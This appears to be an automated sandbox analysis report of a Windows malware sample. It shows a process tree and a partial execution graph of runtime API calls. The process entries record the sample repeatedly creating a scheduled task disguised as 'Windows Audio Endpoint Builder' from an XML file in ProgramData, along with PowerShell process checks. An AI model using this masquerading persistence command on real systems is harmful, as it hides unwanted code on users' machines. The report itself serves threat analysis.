                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:136
                                                                                                                  Start time:10:12:21
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x300000
                                                                                                                  File size:187'904 bytes
                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:137
                                                                                                                  Start time:10:12:26
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:138
                                                                                                                  Start time:10:12:26
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:139
                                                                                                                  Start time:10:12:30
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x300000
                                                                                                                  File size:187'904 bytes
                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:140
                                                                                                                  Start time:10:12:32
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:141
                                                                                                                  Start time:10:12:33
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:142
                                                                                                                  Start time:10:12:36
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:143
                                                                                                                  Start time:10:12:36
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:144
                                                                                                                  Start time:10:12:48
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:145
                                                                                                                  Start time:10:12:39
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x300000
                                                                                                                  File size:187'904 bytes
                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:146
                                                                                                                  Start time:10:12:45
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:147
                                                                                                                  Start time:10:12:45
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:148
                                                                                                                  Start time:10:12:45
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:149
                                                                                                                  Start time:10:12:48
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x300000
                                                                                                                  File size:187'904 bytes
                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:150
                                                                                                                  Start time:10:12:50
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x300000
                                                                                                                  File size:187'904 bytes
                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:151
                                                                                                                  Start time:10:12:55
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:152
                                                                                                                  Start time:10:12:55
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:153
                                                                                                                  Start time:10:13:05
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:154
                                                                                                                  Start time:10:12:59
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x300000
                                                                                                                  File size:187'904 bytes
                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:155
                                                                                                                  Start time:10:13:00
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:156
                                                                                                                  Start time:10:13:04
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:157
                                                                                                                  Start time:10:13:04
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:158
                                                                                                                  Start time:10:13:10
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:159
                                                                                                                  Start time:10:13:13
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):
                                                                                                                  Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:160
                                                                                                                  Start time:10:13:14
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:161
                                                                                                                  Start time:10:13:14
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  Disassembly

                                                                                                                  Reset < >

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:19.1%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:14.7%
                                                                                                                    Total number of Nodes:285
                                                                                                                    Total number of Limit Nodes:4
                                                                                                                    execution_graph 3273 7ff668853b14 3274 7ff668853c3c 3273->3274 3275 7ff668853b56 _cinit 3273->3275 3275->3274 3276 7ff668853bfa RtlUnwindEx 3275->3276 3276->3275 3277 7ff668852db4 3278 7ff668852dd6 3277->3278 3279 7ff668852de4 DeleteCriticalSection 3278->3279 3280 7ff668852e02 3278->3280 3281 7ff668852a80 free 62 API calls 3279->3281 3282 7ff668852e17 DeleteCriticalSection 3280->3282 3283 7ff668852e26 3280->3283 3281->3278 3282->3280 3284 7ff6688570b4 3292 7ff668854314 3284->3292 3286 7ff6688570ca LeaveCriticalSection 3287 7ff668857106 3286->3287 3288 7ff6688570ff 3286->3288 3296 7ff668852e3c LeaveCriticalSection 3287->3296 3295 7ff668852e3c LeaveCriticalSection 3288->3295 3293 7ff668853578 _errno 62 API calls 3292->3293 3294 7ff668854332 3293->3294 3294->3286 3294->3294 3297 7ff66885712e 3300 7ff668852e3c LeaveCriticalSection 3297->3300 3301 7ff668857090 3302 7ff6688570ac 3301->3302 3303 7ff6688570a2 3301->3303 3305 7ff668852e3c LeaveCriticalSection 3303->3305 3306 7ff6688542fc SetUnhandledExceptionFilter 3307 7ff668852d1c 3310 7ff668854d20 3307->3310 3311 7ff668852d25 3310->3311 3312 7ff668854d52 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 3310->3312 3312->3311 3313 7ff6688542b8 3314 7ff6688542f1 3313->3314 3315 7ff6688542c7 3313->3315 3315->3314 3317 7ff668852f80 3315->3317 3318 7ff6688535fc _getptd 62 API calls 3317->3318 3319 7ff668852f89 3318->3319 3322 7ff668854f60 3319->3322 3329 7ff668852fe4 DecodePointer 3322->3329 3338 7ff668852a44 3341 7ff668854130 3338->3341 3342 7ff668852f3c _lock 62 API calls 3341->3342 3346 7ff668854143 3342->3346 3344 7ff668854177 3347 7ff668852a80 free 62 API calls 3344->3347 3346->3344 3348 7ff668852a80 free 62 API calls 3346->3348 3349 7ff668854187 3346->3349 3347->3349 3348->3344 3350 7ff668852e3c LeaveCriticalSection 3349->3350 3351 7ff668851984 3352 7ff668851270 _RunAllParam _lclose 3351->3352 3353 7ff668851998 _RunAllParam 3352->3353 2364 7ff668852b80 GetStartupInfoW 2366 7ff668852baf 2364->2366 2406 7ff668854260 HeapCreate 2366->2406 2368 7ff668852c16 2411 7ff668853754 2368->2411 2370 7ff668852bfd 2514 7ff668853fa0 2370->2514 2371 7ff668852c02 2523 7ff668853d40 2371->2523 2405 7ff668852cd4 2407 7ff668854288 GetVersion 2406->2407 2408 7ff668852bf0 2406->2408 2409 7ff6688542ac 2407->2409 2410 7ff668854292 HeapSetInformation 2407->2410 2408->2368 2408->2370 2408->2371 2409->2408 2410->2409 2570 7ff668852218 2411->2570 2413 7ff66885375f 2574 7ff668852d30 2413->2574 2416 7ff6688537c8 2592 7ff668853498 2416->2592 2417 7ff668853768 FlsAlloc 2417->2416 2419 7ff668853780 2417->2419 2578 7ff668854e54 2419->2578 2423 7ff668853797 FlsSetValue 2423->2416 2424 7ff6688537aa 2423->2424 2583 7ff6688534c0 2424->2583 2505 7ff6688511d5 3192 7ff668851270 2505->3192 2507 7ff6688511bb MessageBoxA 2507->2505 2512 7ff668852680 _amsg_exit 8 API calls 2513 7ff6688511f0 2512->2513 2513->2405 3196 7ff668856180 2514->3196 2517 7ff668856180 _set_error_mode 62 API calls 2519 7ff668853fbd 2517->2519 2518 7ff668853d40 _amsg_exit 62 API calls 2520 7ff668853fd4 2518->2520 2519->2518 2521 7ff668853fde 2519->2521 2522 7ff668853d40 _amsg_exit 62 API calls 2520->2522 2521->2371 2522->2521 2524 7ff668853d74 _amsg_exit 2523->2524 2526 7ff668856180 _set_error_mode 59 API calls 2524->2526 2559 7ff668853ec6 2524->2559 2525 7ff668852680 _amsg_exit 8 API calls 2527 7ff668852c0c 2525->2527 2528 7ff668853d8a 2526->2528 2560 7ff6688521e8 2527->2560 2529 7ff668853f08 GetStdHandle 2528->2529 2530 7ff668856180 _set_error_mode 59 API calls 2528->2530 2531 7ff668853f1b _amsg_exit 2529->2531 2529->2559 2532 7ff668853d9b 2530->2532 2535 7ff668853f55 WriteFile 2531->2535 2531->2559 2532->2529 2532->2559 3202 7ff668856114 2532->3202 2535->2559 2536 7ff668853ef4 2539 7ff66885338c _invalid_parameter_noinfo 16 API calls 2536->2539 2537 7ff668853de1 GetModuleFileNameW 2538 7ff668853e07 2537->2538 2544 7ff668853e30 _amsg_exit 2537->2544 2540 7ff668856114 _amsg_exit 59 API calls 2538->2540 2541 7ff668853f07 2539->2541 2542 7ff668853e18 2540->2542 2541->2529 2542->2544 2546 7ff66885338c _invalid_parameter_noinfo 16 API calls 2542->2546 2543 7ff668853e88 3220 7ff668855fa0 2543->3220 2544->2543 3211 7ff668856028 2544->3211 2546->2544 2549 7ff668853edf 2551 7ff66885338c _invalid_parameter_noinfo 16 API calls 2549->2551 2551->2536 2552 7ff668855fa0 _amsg_exit 59 API calls 2553 7ff668853ead 2552->2553 2555 7ff668853ecb 2553->2555 2556 7ff668853eb1 2553->2556 2554 7ff66885338c _invalid_parameter_noinfo 16 API calls 2554->2543 2557 7ff66885338c _invalid_parameter_noinfo 16 API calls 2555->2557 3229 7ff668855d98 2556->3229 2557->2549 2559->2525 3248 7ff6688521ac GetModuleHandleW 2560->3248 2595 7ff66885348c EncodePointer 2570->2595 2572 7ff668852223 _initp_misc_winsig 2573 7ff668852fa4 EncodePointer 2572->2573 2573->2413 2575 7ff668852d53 2574->2575 2576 7ff668852d59 InitializeCriticalSectionAndSpinCount 2575->2576 2577 7ff668852d8a 2575->2577 2576->2575 2576->2577 2577->2416 2577->2417 2580 7ff668854e79 2578->2580 2581 7ff66885378f 2580->2581 2582 7ff668854e97 Sleep 2580->2582 2596 7ff6688562b4 2580->2596 2581->2416 2581->2423 2582->2580 2582->2581 2627 7ff668852f3c 2583->2627 2593 7ff6688534a7 FlsFree 2592->2593 2594 7ff6688534b4 2592->2594 2593->2594 2597 7ff6688562c9 2596->2597 2603 7ff6688562e6 2596->2603 2598 7ff6688562d7 2597->2598 2597->2603 2604 7ff668853820 2598->2604 2600 7ff6688562fe HeapAlloc 2601 7ff6688562dc 2600->2601 2600->2603 2601->2580 2603->2600 2603->2601 2607 7ff668853458 DecodePointer 2603->2607 2609 7ff668853578 GetLastError FlsGetValue 2604->2609 2606 7ff668853829 2606->2601 2608 7ff668853473 2607->2608 2608->2603 2610 7ff6688535e6 SetLastError 2609->2610 2611 7ff66885359e 2609->2611 2610->2606 2612 7ff668854e54 __onexitinit 57 API calls 2611->2612 2613 7ff6688535ab 2612->2613 2613->2610 2614 7ff6688535b3 FlsSetValue 2613->2614 2615 7ff6688535c9 2614->2615 2616 7ff6688535df 2614->2616 2618 7ff6688534c0 _errno 57 API calls 2615->2618 2621 7ff668852a80 2616->2621 2620 7ff6688535d0 GetCurrentThreadId 2618->2620 2619 7ff6688535e4 2619->2610 2620->2610 2622 7ff668852a85 RtlFreeHeap 2621->2622 2623 7ff668852ab5 free 2621->2623 2622->2623 2624 7ff668852aa0 2622->2624 2623->2619 2625 7ff668853820 _errno 60 API calls 2624->2625 2626 7ff668852aa5 GetLastError 2625->2626 2626->2623 2628 7ff668852f5a 2627->2628 2629 7ff668852f6b EnterCriticalSection 2627->2629 2633 7ff668852e54 2628->2633 2632 7ff668852544 _amsg_exit 61 API calls 2632->2629 2634 7ff668852e7b 2633->2634 2635 7ff668852e92 2633->2635 2636 7ff668853fa0 _FF_MSGBANNER 60 API calls 2634->2636 2647 7ff668852ea7 2635->2647 2658 7ff668854dd4 2635->2658 2638 7ff668852e80 2636->2638 2640 7ff668853d40 _amsg_exit 60 API calls 2638->2640 2643 7ff668852e88 2640->2643 2641 7ff668852ecc 2646 7ff668852f3c _lock 60 API calls 2641->2646 2642 7ff668852ebd 2645 7ff668853820 _errno 60 API calls 2642->2645 2644 7ff6688521e8 malloc 3 API calls 2643->2644 2644->2635 2645->2647 2648 7ff668852ed6 2646->2648 2647->2629 2647->2632 2649 7ff668852ee2 InitializeCriticalSectionAndSpinCount 2648->2649 2650 7ff668852f0f 2648->2650 2652 7ff668852efe LeaveCriticalSection 2649->2652 2653 7ff668852ef1 2649->2653 2651 7ff668852a80 free 60 API calls 2650->2651 2651->2652 2652->2647 2655 7ff668852a80 free 60 API calls 2653->2655 2656 7ff668852ef9 2655->2656 2657 7ff668853820 _errno 60 API calls 2656->2657 2657->2652 2659 7ff668854dfc 2658->2659 2661 7ff668852eb5 2659->2661 2662 7ff668854e10 Sleep 2659->2662 2663 7ff668852ac0 2659->2663 2661->2641 2661->2642 2662->2659 2662->2661 2664 7ff668852ad8 2663->2664 2665 7ff668852b54 2663->2665 2668 7ff668852b10 HeapAlloc 2664->2668 2672 7ff668852b39 2664->2672 2674 7ff668853458 _callnewh DecodePointer 2664->2674 2676 7ff668852af0 2664->2676 2677 7ff668852b3e 2664->2677 2666 7ff668853458 _callnewh DecodePointer 2665->2666 2667 7ff668852b59 2666->2667 2670 7ff668853820 _errno 61 API calls 2667->2670 2668->2664 2671 7ff668852b49 2668->2671 2669 7ff668853fa0 _FF_MSGBANNER 61 API calls 2669->2676 2670->2671 2671->2659 2675 7ff668853820 _errno 61 API calls 2672->2675 2673 7ff668853d40 _amsg_exit 61 API calls 2673->2676 2674->2664 2675->2677 2676->2668 2676->2669 2676->2673 2678 7ff6688521e8 malloc 3 API calls 2676->2678 2679 7ff668853820 _errno 61 API calls 2677->2679 2678->2676 2679->2671 3177 7ff66885205e 3178 7ff6688512ac 77 API calls 3177->3178 3179 7ff668852066 3178->3179 3180 7ff6688519b4 41 API calls 3179->3180 3191 7ff66885209e 3179->3191 3183 7ff668852074 3180->3183 3181 7ff6688511a8 3181->2505 3181->2507 3182 7ff6688520a9 Sleep 3184 7ff6688520e6 MoveFileExA MoveFileExA MoveFileExA 3182->3184 3185 7ff6688520c4 DeleteFileA DeleteFileA RemoveDirectoryA 3182->3185 3186 7ff668851578 69 API calls 3183->3186 3183->3191 3184->3181 3185->3181 3187 7ff668852082 3186->3187 3188 7ff668851694 74 API calls 3187->3188 3187->3191 3189 7ff668852090 3188->3189 3190 7ff668851c88 95 API calls 3189->3190 3189->3191 3190->3191 3191->3181 3191->3182 3193 7ff668851289 _lclose 3192->3193 3194 7ff6688511df 3192->3194 3193->3194 3194->2512 3197 7ff668856188 3196->3197 3198 7ff668853fae 3197->3198 3199 7ff668853820 _errno 62 API calls 3197->3199 3198->2517 3198->2519 3200 7ff6688561ad 3199->3200 3201 7ff668853430 _invalid_parameter_noinfo 17 API calls 3200->3201 3201->3198 3203 7ff66885612f 3202->3203 3204 7ff668856125 3202->3204 3205 7ff668853820 _errno 62 API calls 3203->3205 3204->3203 3209 7ff66885614c 3204->3209 3206 7ff668856138 3205->3206 3207 7ff668853430 _invalid_parameter_noinfo 17 API calls 3206->3207 3208 7ff668853dd7 3207->3208 3208->2536 3208->2537 3209->3208 3210 7ff668853820 _errno 62 API calls 3209->3210 3210->3206 3215 7ff668856038 3211->3215 3212 7ff66885603d 3213 7ff668853e70 3212->3213 3214 7ff668853820 _errno 62 API calls 3212->3214 3213->2543 3213->2554 3216 7ff668856067 3214->3216 3215->3212 3215->3213 3218 7ff66885607b 3215->3218 3217 7ff668853430 _invalid_parameter_noinfo 17 API calls 3216->3217 3217->3213 3218->3213 3219 7ff668853820 _errno 62 API calls 3218->3219 3219->3216 3221 7ff668855fbb 3220->3221 3224 7ff668855fb1 3220->3224 3222 7ff668853820 _errno 62 API calls 3221->3222 3223 7ff668855fc4 3222->3223 3225 